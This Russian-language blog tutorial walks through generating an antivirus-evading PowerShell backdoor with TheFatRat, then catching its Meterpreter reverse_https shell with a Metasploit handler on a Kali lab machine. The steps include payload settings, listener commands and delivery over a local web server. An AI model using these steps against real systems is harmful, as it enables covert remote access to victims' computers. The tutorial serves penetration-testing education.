#2 Генерация бэкдора с помощью TheFatRat.
Здравствуйте, дорогие друзья. Итак, мы установили TheFatRat. Давайте попробуем с его помощью создать бэкдор. Как видим, что с помощью этого инструмента можно делать многое:
![thefatrat](https://timcore.ru/wp-content/uploads/2022/02/screenshot_1-8.png)
Можно создавать бэкдоры для андройда, объединять бэкдоры, и многое другое. В рамках данной статьи, мы попробуем создать бэкдор, который не будет определяться антивирусами, и в списке, он под 6-м номером. Он будет создан с помощью «PwnWinds», и для его создания, нужно ввести номер 06 или 6:
![PwnWinds](https://timcore.ru/wp-content/uploads/2022/02/screenshot_2-8.png)
И я перехожу по этому номеру:
![И я перехожу по этому номеру](https://timcore.ru/wp-content/uploads/2022/02/screenshot_3-6.png)
Нас будет интересовать бэкдор, который сгенерируется с помощью PowerShell. PowerShell – это фреймворк, который был создан для Windows. Он расширяет набор базовых команд, и с помощью него, можно автоматизировать задачи, и запускать команды на машинах с Windows.
Powershell предустановлен на машины Windows, начиная с семерки.
Я создам батник, и это исполняемый файл Windows, который будет использовать Powershell, для того, чтобы осуществить инъекцию бэкдора, и установить обратное шелл-соединение.
Можно окинуть взглядом остальные опции фреймворка, и генерация происходит разными способами, начиная от инъекции бэкдора в pdf-файл, и завершая созданием exe-файла с помощью C#.
Я воспользуюсь вариантом, под номером 1. Просто выбираем бэкдор под номером 1:
![выбор бэкдора под номером 1](https://timcore.ru/wp-content/uploads/2022/02/screenshot_4-6.png)
Как видите, произошел вывод локального ip-адреса, в формате IPV4, и IPV6.
Далее, нам нужно указать наш локальный айпи-адрес:
![Как видите, произошел вывод локального ip-адреса, в формате IPV4, и IPV6. Далее, нам нужно указать наш локальный айпи-адрес](https://timcore.ru/wp-content/uploads/2022/02/screenshot_5-6.png)
Далее, нужно указать номер порта. Я укажу его как: 8080:
![Далее, нужно указать номер порта. Я укажу его как: 8080](https://timcore.ru/wp-content/uploads/2022/02/screenshot_6-6.png)
Далее нужно указать имя выходного файла. Я назову его как: «rev_https_8080_fr»:
![rev_https_8080_fr](https://timcore.ru/wp-content/uploads/2022/02/screenshot_7-6.png)
Далее, меня спрашивают, какой пэйлоад я хочу использовать:
![Далее, меня спрашивают, какой пэйлоад я хочу использовать](https://timcore.ru/wp-content/uploads/2022/02/screenshot_8-6.png)
В данном случае, нам нужен пэйлоад под номером 6:
![В данном случае, нам нужен пэйлоад под номером 6](https://timcore.ru/wp-content/uploads/2022/02/screenshot_9-5.png)
После генерации бэкдора выходим из TheFatRat.
Теперь попробуем, обнаружат ли бэкдор антивирусы. Примечание: настоятельно не рекомендую использовать «VirusTotal» для проверки, но, в моем случае, и для демонстрации, я выполняю проверку на вышеупомянутом сервисе, так как сервис «Nodistribute» не работает:
![VirusTotal](https://timcore.ru/wp-content/uploads/2022/02/screenshot_10-5-1024x546.png)
Как видим, почти половина антивирусов справилась с детектом бэкдора.
Это лишь пример, и шансов на успешную атаку 50/50.
Давайте протестируем бэкдор, и для начала, мы попробуем прослушивать входящее подключение, с помощью «msfconsole»:
![msfconsole](https://timcore.ru/wp-content/uploads/2022/02/screenshot_11-5.png)
Наш бэкдор связан с meterpreter, то есть, когда мы начнем прослушивать входящее соединение, то мы можем использовать тот же самый модуль и пэйлоад.
Для начала пропишем: «exploit/multi/handler»:
![exploit/multi/handler](https://timcore.ru/wp-content/uploads/2022/02/screenshot_12-5.png)
Далее, нам нужно указать пэйлоад с помощью команды «set PAYLOAD windows/meterpreter/reverse_https»:
![set PAYLOAD windows/meterpreter/reverse_https](https://timcore.ru/wp-content/uploads/2022/02/screenshot_13-5.png)
Теперь нам нужно указать LHOST. Это тот же самый айпи, который мы использовали, для создания бэкдора: «10.0.2.7». Сразу укажем порт, который мы использовали. Это – «8080»:
![set LHOST 10.0.2.7 set LPORT 8080](https://timcore.ru/wp-content/uploads/2022/02/screenshot_14-3.png)
Проверим наш пэйлоад, с помощью команды «show options»:
![show options](https://timcore.ru/wp-content/uploads/2022/02/screenshot_15-4.png)
Перед запуском, я воспользуюсь командой «save», для сохранения нашей конфигурации:
![Перед запуском, я воспользуюсь командой «save», для сохранения нашей конфигурации](https://timcore.ru/wp-content/uploads/2022/02/screenshot_16-3.png)
В следующий раз, при запуске msfconsole, multi/handler уже будет запущен.
Последний шаг – это команда «exploit»:
![Последний шаг – это команда «exploit»](https://timcore.ru/wp-content/uploads/2022/02/screenshot_17-3.png)
Теперь нам остается только ждать входящее подключение. Нам нужно запустить бэкдор на целевой машине с Windows. Доставка будет простой. Я просто скопирую наш файл на веб-сервер, и скачаю его на машине Windows для наглядности:
![копирование бэкдора на веб-сервер](https://timcore.ru/wp-content/uploads/2022/02/screenshot_18-3.png)
Операция копирования прошла успешно.
Перед загрузкой файлов, мне нужно запустить сервер на Kali, с помощью команды: «service apache2 start»:
![service apache2 start](https://timcore.ru/wp-content/uploads/2022/02/screenshot_19-3.png)
Переходим в машину на Windows, и качаем наш бэкдор:
![Переходим в машину на Windows, и качаем наш бэкдор](https://timcore.ru/wp-content/uploads/2022/02/screenshot_20-3.png)
Запускаем, и переходим в терминал Kali:
![Запускаем, и переходим в терминал Kali](https://timcore.ru/wp-content/uploads/2022/02/screenshot_21-2.png)
У Вас должен открыться шелл Meterpreter.
На этом все. Всем хорошего дня!